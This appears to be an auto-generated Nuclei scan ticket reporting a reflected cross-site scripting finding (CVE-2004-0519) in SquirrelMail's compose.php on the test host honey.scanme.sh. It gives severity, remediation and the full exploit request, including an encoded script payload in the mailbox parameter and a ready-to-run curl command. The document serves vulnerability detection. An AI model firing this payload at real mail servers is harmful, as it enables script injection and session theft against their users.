mkrs2404 / tickets

SquirrelMail 1.4.x - Folder Name Cross-Site Scripting (CVE-2004-0519) found on honey.scanme.sh #29

Closed mkrs2404 closed 1 month ago

mkrs2404 commented 4 months ago

Details: CVE-2004-0519 matched at honey.scanme.sh

Protocol: HTTP

Full URL: https://honey.scanme.sh/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

Timestamp: Tue Apr 30 19:26:14 +0530 IST 2024

Template Information

Name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting
Authors: dhiyaneshdk
Tags: cve, cve2004, squirrelmail, edb, xss, sgi
Severity: medium
Description: Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php.
Remediation: Upgrade to the latest version.
CVSS-Metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
CVE-ID: CVE-2004-0519
CVSS-Score: 6.80
vendor: sgi
product: propack

Request

GET /mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: honey.scanme.sh
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6.1 Safari/605.1.1516.6.1 Ddg/16.6.1
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 344
Content-Type: text/html
Date: Tue, 30 Apr 2024 13:56:14 GMT

GET /mail/src/compose.php?mailbox=</script><script>alert(document.domain)</script> HTTP/1.1
Host: honey.scanme.sh
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6.1 Safari/605.1.1516.6.1 Ddg/16.6.1

CURL command

curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6.1 Safari/605.1.1516.6.1 Ddg/16.6.1' 'https://honey.scanme.sh/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

Generated by Nuclei v3.2.5